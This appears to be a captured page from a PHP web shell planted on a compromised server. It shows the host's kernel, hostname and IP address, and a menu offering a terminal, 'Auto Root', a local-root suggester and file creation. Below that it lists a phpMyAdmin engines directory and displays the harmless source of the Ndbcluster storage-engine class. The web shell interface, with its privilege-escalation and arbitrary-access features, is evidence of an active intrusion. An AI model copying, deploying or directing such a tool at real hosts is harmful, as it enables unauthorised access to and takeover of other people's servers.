Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.19.76.4
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
libraries /
classes /
Engines /
Delete
Unzip
Name
Size
Permission
Date
Action
Bdb.php
1.85
KB
-rw-r--r--
2021-02-05 18:26
Berkeleydb.php
278
B
-rw-r--r--
2021-02-05 18:26
Binlog.php
567
B
-rw-r--r--
2021-02-05 18:26
Innobase.php
285
B
-rw-r--r--
2021-02-05 18:26
Innodb.php
13.43
KB
-rw-r--r--
2021-02-05 18:26
Memory.php
653
B
-rw-r--r--
2021-02-05 18:26
Merge.php
314
B
-rw-r--r--
2021-02-05 18:26
MrgMyisam.php
531
B
-rw-r--r--
2021-02-05 18:26
Myisam.php
3.29
KB
-rw-r--r--
2021-02-05 18:26
Ndbcluster.php
1.07
KB
-rw-r--r--
2021-02-05 18:26
Pbxt.php
7.04
KB
-rw-r--r--
2021-02-05 18:26
PerformanceSchema.php
602
B
-rw-r--r--
2021-02-05 18:26
Save
Rename
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * The NDBCLUSTER storage engine * * @package PhpMyAdmin-Engines */ declare(strict_types=1); namespace PhpMyAdmin\Engines; use PhpMyAdmin\StorageEngine; /** * The NDBCLUSTER storage engine * * @package PhpMyAdmin-Engines */ class Ndbcluster extends StorageEngine { /** * Returns array with variable names related to NDBCLUSTER storage engine * * @return array variable names */ public function getVariables() { return [ 'ndb_connectstring' => [], ]; } /** * Returns the pattern to be used in the query for SQL variables * related to NDBCLUSTER storage engine * * @return string SQL query LIKE pattern */ public function getVariablesLikePattern() { return 'ndb\\_%'; } /** * Returns string with filename for the MySQL help page * about this storage engine * * @return string mysql helppage filename */ public function getMysqlHelpPage() { return 'ndbcluster'; } }